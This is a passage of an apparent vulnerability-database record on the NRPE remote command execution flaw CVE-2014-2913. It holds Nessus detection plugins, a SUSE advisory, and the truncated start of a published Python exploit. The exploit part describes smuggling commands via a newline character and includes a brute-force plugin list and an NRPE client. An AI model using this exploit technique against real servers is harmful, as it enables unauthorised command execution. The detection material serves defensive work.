/ 13.1\", release);\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nourarch = get_kb_item(\"Host/cpu\");\nif (!ourarch) audit(AUDIT_UNKNOWN_ARCH);\nif (ourarch !~ \"^(i586|i686|x86_64)$\") audit(AUDIT_ARCH_NOT, \"i586 / i686 / x86_64\", ourarch);\n\nflag = 0;\n\nif ( rpm_check(release:\"SUSE12.3\", reference:\"nagios-plugins-nrpe-2.14-3.4.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.3\", reference:\"nagios-plugins-nrpe-debuginfo-2.14-3.4.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.3\", reference:\"nrpe-2.14-3.4.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.3\", reference:\"nrpe-debuginfo-2.14-3.4.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.3\", reference:\"nrpe-debugsource-2.14-3.4.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"nagios-plugins-nrpe-2.15-4.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"nagios-plugins-nrpe-debuginfo-2.15-4.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"nrpe-2.15-4.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"nrpe-debuginfo-2.15-4.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"nrpe-debugsource-2.15-4.1\") ) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"nagios-plugins-nrpe / nagios-plugins-nrpe-debuginfo / nrpe / etc\");\n}\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2019-02-21T01:21:12", "bulletinFamily": "scanner", "description": "nagios-nrpe has been updated to prevent possible remote command execution when command arguments are enabled. This issue affects versions 2.15 and older.\n\nFurther information is available at http://seclists.org/fulldisclosure/2014/Apr/240\n\nThese security issues have been fixed :\n\n - Remote command execution (CVE-2014-2913)", "modified": "2014-05-21T00:00:00", "id": "SUSE_11_NAGIOS-NRPE-140506.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=74116", "published": "2014-05-21T00:00:00", "title": "SuSE 11.3 Security Update : nagios-nrpe, nagios-nrpe-debuginfo, nagios-nrpe-debugsource, etc (SAT Patch Number 9204)", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from SuSE 11 update information. The text itself is\n# copyright (C) Novell, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(74116);\n script_version(\"$Revision: 1.1 $\");\n script_cvs_date(\"$Date: 2014/05/21 10:44:53 $\");\n\n script_cve_id(\"CVE-2014-2913\");\n\n script_name(english:\"SuSE 11.3 Security Update : nagios-nrpe, nagios-nrpe-debuginfo, nagios-nrpe-debugsource, etc (SAT Patch Number 9204)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote SuSE 11 host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"nagios-nrpe has been updated to prevent possible remote command\nexecution when command arguments are enabled. This issue affects\nversions 2.15 and older.\n\nFurther information is available at\nhttp://seclists.org/fulldisclosure/2014/Apr/240\n\nThese security issues have been fixed :\n\n - Remote command execution (CVE-2014-2913)\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=874743\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2014-2913.html\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Apply SAT patch number 9204.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:nagios-nrpe\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:nagios-nrpe-doc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:nagios-plugins-nrpe\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:suse_linux:11\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/05/06\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/05/21\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2014 Tenable Network Security, Inc.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release !~ \"^(SLED|SLES)11\") audit(AUDIT_OS_NOT, \"SuSE 11\");\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu !~ \"^i[3-6]86$\" && \"x86_64\" >!< cpu && \"s390x\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"SuSE 11\", cpu);\n\npl = get_kb_item(\"Host/SuSE/patchlevel\");\nif (isnull(pl) || int(pl) != 3) audit(AUDIT_OS_NOT, \"SuSE 11.3\");\n\n\nflag = 0;\nif (rpm_check(release:\"SLES11\", sp:3, cpu:\"i586\", reference:\"nagios-nrpe-2.12-24.4.10.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:3, cpu:\"i586\", reference:\"nagios-nrpe-doc-2.12-24.4.10.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:3, cpu:\"i586\", reference:\"nagios-plugins-nrpe-2.12-24.4.10.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:3, cpu:\"x86_64\", reference:\"nagios-nrpe-2.12-24.4.10.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:3, cpu:\"x86_64\", reference:\"nagios-nrpe-doc-2.12-24.4.10.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:3, cpu:\"x86_64\", reference:\"nagios-plugins-nrpe-2.12-24.4.10.1\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2019-02-21T01:22:21", "bulletinFamily": "scanner", "description": "The remote host is affected by the vulnerability described in GLSA-201408-18 (NRPE: Multiple Vulnerabilities)\n\n Multiple vulnerabilities have been discovered in NRPE. Please review the CVE identifiers referenced below for details.\n Impact :\n\n A remote attacker can utilize multiple vectors to execute arbitrary code.\n Workaround :\n\n There is no known workaround at this time.", "modified": "2018-12-05T00:00:00", "id": "GENTOO_GLSA-201408-18.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=77462", "published": "2014-08-30T00:00:00", "title": "GLSA-201408-18 : NRPE: Multiple Vulnerabilities", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Gentoo Linux Security Advisory GLSA 201408-18.\n#\n# The advisory text is Copyright (C) 2001-2015 Gentoo Foundation, Inc.\n# and licensed under the Creative Commons - Attribution / Share Alike \n# license. See http://creativecommons.org/licenses/by-sa/3.0/\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(77462);\n script_version(\"1.5\");\n script_cvs_date(\"Date: 2018/12/05 20:31:22\");\n\n script_cve_id(\"CVE-2013-1362\", \"CVE-2014-2913\");\n script_bugtraq_id(58142, 66969);\n script_xref(name:\"GLSA\", value:\"201408-18\");\n\n script_name(english:\"GLSA-201408-18 : NRPE: Multiple Vulnerabilities\");\n script_summary(english:\"Checks for updated package(s) in /var/db/pkg\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Gentoo host is missing one or more security-related\npatches.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"The remote host is affected by the vulnerability described in GLSA-201408-18\n(NRPE: Multiple Vulnerabilities)\n\n Multiple vulnerabilities have been discovered in NRPE. Please review the\n CVE identifiers referenced below for details.\n \nImpact :\n\n A remote attacker can utilize multiple vectors to execute arbitrary\n code.\n \nWorkaround :\n\n There is no known workaround at this time.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security.gentoo.org/glsa/201408-18\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"All NRPE users should upgrade to the latest version:\n # emerge --sync\n # emerge --ask --oneshot --verbose '>=net-analyzer/nrpe-2.15'\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Nagios Remote Plugin Executor Arbitrary Command Execution');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:gentoo:linux:nrpe\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:gentoo:linux\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/08/30\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/08/30\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2014-2018 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Gentoo Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Gentoo/release\", \"Host/Gentoo/qpkg-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"qpkg.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Gentoo/release\")) audit(AUDIT_OS_NOT, \"Gentoo\");\nif (!get_kb_item(\"Host/Gentoo/qpkg-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\n\nif (qpkg_check(package:\"net-analyzer/nrpe\", unaffected:make_list(\"ge 2.15\"), vulnerable:make_list(\"lt 2.15\"))) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:qpkg_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = qpkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"NRPE\");\n}\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "suse": [{"lastseen": "2016-09-04T11:49:45", "bulletinFamily": "unix", "description": "nagios-nrpe has been updated to prevent possible remote command execution\n when command arguments are enabled. This issue affects versions 2.15 and\n older.\n\n Further information is available at\n <a rel=\"nofollow\" href=\"http://seclists.org/fulldisclosure/2014/Apr/240\">http://seclists.org/fulldisclosure/2014/Apr/240</a>\n &lt;<a rel=\"nofollow\" href=\"http://seclists.org/fulldisclosure/2014/Apr/240\">http://seclists.org/fulldisclosure/2014/Apr/240</a>&gt;\n\n These security issues have been fixed:\n\n * Remote command execution (CVE-2014-2913)\n", "modified": "2014-05-20T19:04:16", "published": "2014-05-20T19:04:16", "id": "SUSE-SU-2014:0682-1", "href": "http://lists.opensuse.org/opensuse-security-announce/2014-05/msg00011.html", "type": "suse", "title": "Security update for nagios-nrpe, nagios-nrpe-debuginfo, nagios-nrpe-debugsource, nagios-nrpe-doc, nagios-plugins-nrpe (important)", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "zdt": [{"lastseen": "2018-03-13T23:22:00", "bulletinFamily": "exploit", "description": "NRPE version 2.15 remote command execution exploit written in Python.", "modified": "2014-08-30T00:00:00", "published": "2014-08-30T00:00:00", "id": "1337DAY-ID-22565", "href": "https://0day.today/exploit/description/22565", "type": "zdt", "title": "NRPE 2.15 - Remote Code Execution Vulnerability", "sourceData": "#!/usr/bin/python\r\n#\r\n#\r\n# Exploit Title : NRPE <= 2.15 Remote Code Execution Vulnerability\r\n#\r\n# Discovered by : Dawid Golunski\r\n# dawid (at) legalhackers (dot) com\r\n# legalhackers.com\r\n#\r\n# Exploit Author : Claudio Viviani\r\n# http://www.homelab.it\r\n#\r\n# [email\u00a0protected]\r\n# [email\u00a0protected]\r\n#\r\n# https://www.facebook.com/homelabit\r\n# https://twitter.com/homelabit\r\n# https://plus.google.com/+HomelabIt1/\r\n# https://www.youtube.com/channel/UCqqmSdMqf_exicCe_DjlBww\r\n#\r\n#\r\n#\r\n# C crc32 function ripped from check_nrpe_clone by Alan Brenner <[email\u00a0protected]>\r\n# http://www.abcompcons.com/files/nrpe_client.py\r\n#\r\n# pyOpenSSL Library required (http://pyopenssl.sourceforge.net/)\r\n#\r\n# [[email\u00a0protected] ~]# pip-python install pyOpenSSL\r\n#\r\n# NRPE <= 2.15 Remote Command Execution Vulnerability\r\n# Release date: 17.04.2014\r\n# Discovered by: Dawid Golunski\r\n# Severity: High\r\n# CVE-2014-2913\r\n#\r\n# http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-2913\r\n# http://www.exploit-db.com/exploits/32925/\r\n# http://www.homelab.it/index.php/2014/05/03/nagios-nrpe-remote-command-injection-test-fix/ (ITA)\r\n#\r\n# Tested on CentOS 5.x, CentOS 6.x, BacBox 3.x, KaliLinux 1.0.6 with Python 2.x\r\n#\r\n# Demo: https://www.youtube.com/watch?v=nmYiBdnWWcE\r\n#\r\n\r\nimport OpenSSL # non-standard, see http://pyopenssl.sourceforge.net/\r\nimport optparse\r\nimport os\r\nimport signal\r\nimport socket\r\nimport struct\r\nimport sys\r\nimport time\r\n\r\nbanner = \"\"\"\r\n\r\n$$\\ $$\\ $$$$$$$\\ $$$$$$$\\ $$$$$$$$\\ $$$$$$\\ $$\\ $$$$$$$\\\\\r\n$$$\\ $$ |$$ __$$\\ $$ __$$\\ $$ _____| $$ __$$\\ $$$$ | $$ ____|\r\n$$$$\\ $$ |$$ | $$ |$$ | $$ |$$ | \\__/ $$ | \\_$$ | $$ |\r\n$$ $$\\$$ |$$$$$$$ |$$$$$$$ |$$$$$\\ $$$$$$ | $$ | $$$$$$$\\\\\r\n$$ \\$$$$ |$$ __$$< $$ ____/ $$ __| $$ ____/ $$ | \\_____$$\\\\\r\n$$ |\\$$$ |$$ | $$ |$$ | $$ | $$ | $$ | $$\\ $$ |\r\n$$ | \\$$ |$$ | $$ |$$ | $$$$$$$$\\ $$$$$$$$\\ $$\\ $$$$$$\\\\$$$$$$ |\r\n\\__| \\__|\\__| \\__|\\__| \\________| \\________|\\__|\\______|\\______/\r\n\r\n\r\n\r\n $$$$$$$\\ $$$$$$\\ $$$$$$$$\\\\\r\n $$ __$$\\ $$ __$$\\ $$ _____|\r\n $$ | $$ |$$ / \\__|$$ |\r\n $$$$$$$ |$$ | $$$$$\\\\\r\n $$ __$$< $$ | $$ __|\r\n $$ | $$ |$$ | $$\\ $$ |\r\n $$ | $$ |\\$$$$$$ |$$$$$$$$\\\\\r\n \\__| \\__| \\______/ \\________|\r\n NRPE <= 2.15 R3m0t3 C0mm4nd Ex3cut10n\r\n\r\n\r\n =============================================\r\n - Release date: 17.04.2014\r\n - Discovered by: Dawid Golunski\r\n - Severity: High\r\n - CVE: 2014-2913\r\n =============================================\r\n\r\n Written by:\r\n\r\n Claudio Viviani\r\n\r\n http://www.homelab.it\r\n\r\n [email\u00a0protected]\r\n [email\u00a0protected]\r\n\r\n https://www.facebook.com/homelabit\r\n https://twitter.com/homelabit\r\n https://plus.google.com/+HomelabIt1/\r\n https://www.youtube.com/channel/UCqqmSdMqf_exicCe_DjlBww\r\n\r\n\"\"\"\r\n# Plugin list for Brute force mode\r\nPluginList = ['check_all',\r\n 'check_apt',\r\n 'check_bdii',\r\n 'check_bonding',\r\n 'check_breeze',\r\n 'check_by_ssh',\r\n 'check_check-updates',\r\n 'check_check_sip',\r\n 'check_cluster',\r\n 'check_dhcp',\r\n 'check_dig',\r\n 'check_disk',\r\n 'check_disk_smb',\r\n 'check_dns',\r\n 'check_dpm-disk',\r\n 'check_dpm-head',\r\n 'check_dummy',\r\n 'check_file_age',\r\n 'check_flexlm',\r\n 'check_fping',\r\n 'check_game',\r\n 'check_hpjd',\r\n 'check_http',\r\n 'check_icmp',\r\n 'check_ide_smart',\r\n 'check_ifoperstatus',\r\n 'check_ifstatus',\r\n 'check_ircd',\r\n 'check_lcgdm',\r\n 'check_lcgdm-common',\r\n 'check_ldap',\r\n 'check_lfc',\r\n 'check_linux_raid',\r\n 'check_load',\r\n 'check_log',\r\n 'check_mailq',\r\n 'check_mrtg',\r\n 'check_mrtgtraf',\r\n 'check_mysql',\r\n 'check_nagios',\r\n 'check_nrpe',\r\n 'check_nt',\r\n 'check_ntp',\r\n 'check_nwstat',\r\n 'check_openmanage',\r\n 'check_oracle',\r\n 'check_overcr',\r\n 'check_perl',\r\n 'check_pgsql',\r\n 'check_ping',\r\n 'check_procs',\r\n 'check_radius',\r\n 'check_real',\r\n 'check_rhev',\r\n 'check_rpc',\r\n 'check_sensors',\r\n 'check_smtp',\r\n 'check_snmp',\r\n 'check_ssh',\r\n 'check_swap',\r\n 'check_tcp',\r\n 'check_time',\r\n 'check_ups',\r\n 'check_users',\r\n 'check_wave']\r\n\r\n\r\n\r\n# nrpe 2.15 skip chars \"|`&><'\\\"\\\\[]{};\" and \"$()\" but not \"\\x0a\"(new line)\r\nevilchar = \"\\x0a\"\r\n\r\nQUERY_PACKET = 1\r\nRESPONSE_PACKET = 2\r\n\r\nNRPE_PACKET_VERSION_2 = 2\r\n\r\n# max amount of data we'll send in one query/response\r\nMAX_PACKETBUFFER_LENGTH = 1024\r\n\r\n\r\n#def debug(sMessage):\r\n# \"\"\"Send a string to STDERR\"\"\"\r\n# if DEBUG:\r\n# sys.stderr.write(\"%s\\n\" % sMessage)\r\n\r\nclass DataPacket:\r\n \"\"\"A Python implementation of the C struct, packet.\"\"\"\r\n def __init__(self, packet_version, packet_type):\r\n self.nPacketVersion = packet_version # int16\r\n self.nPacketType = packet_type # int16\r\n self.nCRC32 = 0 # u_int32\r\n self.nResultCode = 2324 # int16\r\n self.sData = ''\r\n self.tCRC32 = (\r\n 0x00000000, 0x77073096, 0xee0e612c, 0x990951ba, 0x076dc419,\r\n 0x706af48f, 0xe963a535, 0x9e6495a3, 0x0edb8832, 0x79dcb8a4,\r\n 0xe0d5e91e, 0x97d2d988, 0x09b64c2b, 0x7eb17cbd, 0xe7b82d07,\r\n 0x90bf1d91, 0x1db71064, 0x6ab020f2, 0xf3b97148, 0x84be41de,\r\n 0x1adad47d, 0x6ddde4eb, 0xf4d4b551, 0x83d385c7, 0x136c9856,\r\n 0x646ba8c0, 0xfd62f97a, 0x8a65c9ec, 0x14015c4f, 0x63066cd9,\r\n 0xfa0f3d63, 0x8d080df5, 0x3b6e20c8, 0x4c69105e, 0xd56041e4,\r\n 0xa2677172, 0x3c03e4d1, 0x4b04d447, 0xd20d85fd, 0xa50ab56b,\r\n 0x35b5a8fa, 0x42b2986c, 0xdbbbc9d6, 0xacbcf940, 0x32d86ce3,\r\n 0x45df5c75, 0xdcd60dcf, 0xabd13d59, 0x26d930ac, 0x51de003a,\r\n 0xc8d75180, 0xbfd06116, 0x21b4f4b5, 0x56b3c423, 0xcfba9599,\r\n 0xb8bda50f, 0x2802b89e, 0x5f058808, 0xc60cd9b2, 0xb10be924,\r\n 0x2f6f7c87, 0x58684c11, 0xc1611dab, 0xb6662d3d, 0x76dc4190,\r\n 0x01db7106, 0x98d220bc, 0xefd5102a, 0x71b18589, 0x06b6b51f,\r\n 0x9fbfe4a5, 0xe8b8d433, 0x7807c9a2, 0x0f00f934, 0x9609a88e,\r\n 0xe10e9818, 0x7f6a0dbb, 0x086d3d2d, 0x91646c97, 0xe6635c01,\r\n 0x6b6b51f4, 0x1c6c6162, 0x856530d8, 0xf262004e, 0x6c0695ed,\r\n 0x1b01a57b, 0x8208f4c1, 0xf50fc457, 0x65b0d9c6, 0x12b7e950,\r\n 0x8bbeb8ea, 0xfcb9887c, 0x62dd1ddf, 0x15da2d49, 0x8cd37cf3,\r\n 0xfbd44c65, 0x4db26158, 0x3ab551ce, 0xa3bc0074, 0xd4bb30e2,\r\n 0x4adfa541, 0x3dd895d7, 0xa4d1c46d, 0xd3d6f4fb, 0x4369e96a,\r\n 0x346ed9fc, 0xad678846, 0xda60b8d0, 0x44042d73, 0x33031de5,\r\n 0xaa0a4c5f, 0xdd0d7cc9, 0x5005713c, 0x270241aa, 0xbe0b1010,\r\n 0xc90c2086, 0x5768b525, 0x206f85b3, 0xb966d409, 0xce61e49f,\r\n 0x5edef90e, 0x29d9c998, 0xb0d09822, 0xc7d7a8b4, 0x59b33d17,\r\n 0x2eb40d81, 0xb7bd5c3b, 0xc0ba6cad, 0xedb88320, 0x9abfb3b6,\r\n 0x03b6e20c, 0x74b1d29a, 0xead54739, 0x9dd277af, 0x04db2615,\r\n 0x73dc1683, 0xe3630b12, 0x94643b84, 0x0d6d6a3e, 0x7a6a5aa8,\r\n 0xe40ecf0b, 0x9309ff9d, 0x0a00ae27, 0x7d079eb1, 0xf00f9344,\r\n 0x8708a3d2, 0x1e01f268, 0x6906c2fe, 0xf762575d, 0x806567cb,\r\n 0x196c3671, 0x6e6b06e7, 0xfed41b76, 0x89d32be0, 0x10da7a5a,\r\n 0x67dd4acc, 0xf9b9df6f, 0x8ebeeff9, 0x17b7be43, 0x60b08ed5,\r\n 0xd6d6a3e8, 0xa1d1937e, 0x38d8c2c4, 0x4fdff252, 0xd1bb67f1,\r\n 0xa6bc5767, 0x3fb506dd, 0x48b2364b, 0xd80d2bda, 0xaf0a1b4c,\r\n 0x36034af6, 0x41047a60, 0xdf60efc3, 0xa867df55, 0x316e8eef,\r\n 0x4669be79, 0xcb61b38c, 0xbc66831a, 0x256fd2a0, 0x5268e236,\r\n 0xcc0c7795, 0xbb0b4703, 0x220216b9, 0x5505262f, 0xc5ba3bbe,\r\n 0xb2bd0b28, 0x2bb45a92, 0x5cb36a04, 0xc2d7ffa7, 0xb5d0cf31,\r\n 0x2cd99e8b, 0x5bdeae1d, 0x9b64c2b0, 0xec63f226, 0x756aa39c,\r\n 0x026d930a, 0x9c0906a9, 0xeb0e363f, 0x72076785, 0x05005713,\r\n 0x95bf4a82, 0xe2b87a14, 0x7bb12bae, 0x0cb61b38, 0x92d28e9b,\r\n 0xe5d5be0d, 0x7cdcefb7, 0x0bdbdf21, 0x86d3d2d4, 0xf1d4e242,\r\n 0x68ddb3f8, 0x1fda836e, 0x81be16cd, 0xf6b9265b, 0x6fb077e1,\r\n 0x18b74777, 0x88085ae6, 0xff0f6a70, 0x66063bca, 0x11010b5c,\r\n 0x8f659eff, 0xf862ae69, 0x616bffd3, 0x166ccf45, 0xa00ae278,\r\n 0xd70dd2ee, 0x4e048354, 0x3903b3c2, 0xa7672661, 0xd06016f7,\r\n 0x4969474d, 0x3e6e77db, 0xaed16a4a, 0xd9d65adc, 0x40df0b66,\r\n 0x37d83bf0, 0xa9bcae53, 0xdebb9ec5, 0x47b2cf7f, 0x30b5ffe9,\r\n 0xbdbdf21c, 0xcabac28a, 0x53b39330, 0x24b4a3a6, 0xbad03605,\r\n 0xcdd70693, 0x54de5729, 0x23d967bf, 0xb3667a2e, 0xc4614ab8,\r\n 0x5d681b02, 0x2a6f2b94, 0xb40bbe37, 0xc30c8ea1, 0x5a05df1b,\r\n 0x2d02ef8d)\r\n\r\n def __str__(self):\r\n # Turn whatever string data we have into a null terminated string\r\n if len(self.sData) < MAX_PACKETBUFFER_LENGTH:\r\n sData = self.sData + \"\\0\" * (MAX_PACKETBUFFER_LENGTH - len(self.sData))\r\n sData += \"SR\" # not sure about this, from perl\r\n elif len(self.sData) == MAX_PACKETBUFFER_LENGTH + 2:\r\n sData = self.sData\r\n else:\r\n raise ValueError(\"CHECK_NRPE: invalid input\")\r\n # Return a string that equals the C struct, not something printable\r\n return struct.pack(\"!hhLh\" + str(len(sData)) + \"s\", self.nPacketVersion,\r\n self.nPacketType, self.nCRC32, self.nResultCode, sData)\r\n\r\n def __len__(self):\r\n return len(self.__str__())\r\n\r\n def dumpself(self):\r\n \"\"\"Debugging output for self as C structure.\r\n\r\n Not normally used.\"\"\"\r\n sElf = self.__str__()\r\n sPrev = sElf[0:1]\r\n nCount = 0\r\n ii = -1\r\n for sChar in sElf[1:]:\r\n ii += 1\r\n if sChar == sPrev:\r\n nCount += 1\r\n continue\r\n if nCount:\r\n print \"%d\\t%d *\" % (ii - nCount, nCount + 1),\r\n nCount = 0\r\n else:\r\n print \"%d\\t\" % ii,\r\n print \"\\t'%s' (%d)\" % (sPrev, ord(sPrev))\r\n sPrev = sChar\r\n print \"%d\\t\\t'%s' (%d)\" % (ii + 1, sPrev, ord(sPrev))\r\n\r\n def calculate_crc32(self):\r\n \"\"\"Calculate the CRC32 value for the string version of self.\"\"\"\r\n nCRC = 0xFFFFFFFF\r\n for ii in self.__str__():\r\n nIndex = (nCRC ^ ord(ii)) & 0xFF\r\n nCRC = ((nCRC >> 8) & 0x00FFFFFF) ^ self.tCRC32[nIndex]\r\n self.nCRC32 = nCRC ^ 0xFFFFFFFF\r\n #debug(\"DataPacket.calculate_crc32 = %d\" % self.nCRC32)\r\n\r\n def extract(self, sQuery):\r\n \"\"\"Turn a string into the DataPacket attributes.\"\"\"\r\n #debug(\"DataPacket.extract(%d)\" % len(sQuery))\r\n tVals = struct.unpack(\"!hhLh\" + str(len(sQuery) - 10) + \"s\", sQuery)\r\n self.nPacketVersion = tVals[0]\r\n self.nPacketType = tVals[1]\r\n self.nCRC32 = tVals[2]\r\n self.nResultCode = tVals[3]\r\n self.sData = tVals[4]\r\n\r\nm_nTimeout = 0\r\ndef alarm_handler(nSignum, oFrame):\r\n \"\"\"Timeout catcher\"\"\"\r\n raise KeyboardInterrupt(\"CHECK_NRPE: Socket timeout after %d seconds.\" %\r\n m_nTimeout)\r\n\r\n\r\nclass NrpeClient(DataPacket):\r\n \"\"\"Everything needed to send a message to an NRPE server and get data back.\r\n \"\"\"\r\n def __init__(self, server_name, server_port=5666, use_ssl=True, timeout=10,\r\n packet_version=NRPE_PACKET_VERSION_2):\r\n DataPacket.__init__(self, packet_version, QUERY_PACKET)\r\n self.sServer = server_name\r\n self.nPort = server_port\r\n self.bUseSSL = use_ssl\r\n self.nTimeout = timeout\r\n\r\n def run_query(self, sQuery):\r\n \"\"\"Connect to the NRPE server, send the query and get back data.\r\n \"\"\"\r\n # initialize alarm signal handling and set timeout\r\n signal.signal(signal.SIGALRM, alarm_handler)\r\n signal.alarm(self.nTimeout)\r\n\r\n # try to connect to the host at the given port number\r\n oSocket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\r\n # do SSL handshake\r\n if self.bUseSSL:\r\n oContext = OpenSSL.SSL.Context(OpenSSL.SSL.TLSv1_METHOD)\r\n oContext.set_cipher_list('ADH')\r\n oConnection = OpenSSL.SSL.Connection(oContext, oSocket)\r\n else:\r\n oConnection = oSocket\r\n\r\n oConnection.connect((self.sServer, self.nPort))\r\n\r\n # we're connected and ready to go\r\n self.sData = sQuery\r\n self.nCRC32 = 0\r\n self.calculate_crc32()\r\n\r\n # send the packet\r\n oConnection.send(str(self))\r\n\r\n # wait for the response packet\r\n sRval = oConnection.recv(len(self))\r\n\r\n # close the connection\r\n if self.bUseSSL and not oConnection.shutdown():\r\n try:\r\n sRval += oConnection.recv(len(self))\r\n except OpenSSL.SSL.ZeroReturnError:\r\n pass\r\n oSocket.close()\r\n del oSocket, oConnection\r\n if self.bUseSSL:\r\n del oContext\r\n\r\n # reset timeout\r\n signal.alarm(0)\r\n\r\n if len(sRval) == 0:\r\n raise IOError(\"CHECK_NRPE: Received 0 bytes from daemon.\" +\r\n \"Check the remote server logs for error messages.\")\r\n elif len(sRval) < len(self):\r\n raise IOError(\"CHECK_NRPE: Receive underflow - only \" +\r\n \"%d bytes received (%d expected).\" % (len(sRval), len(self)))\r\n\r\n # Become the received data\r\n self.extract(sRval)\r\n\r\n # check the crc 32 value\r\n nRvalCRC = 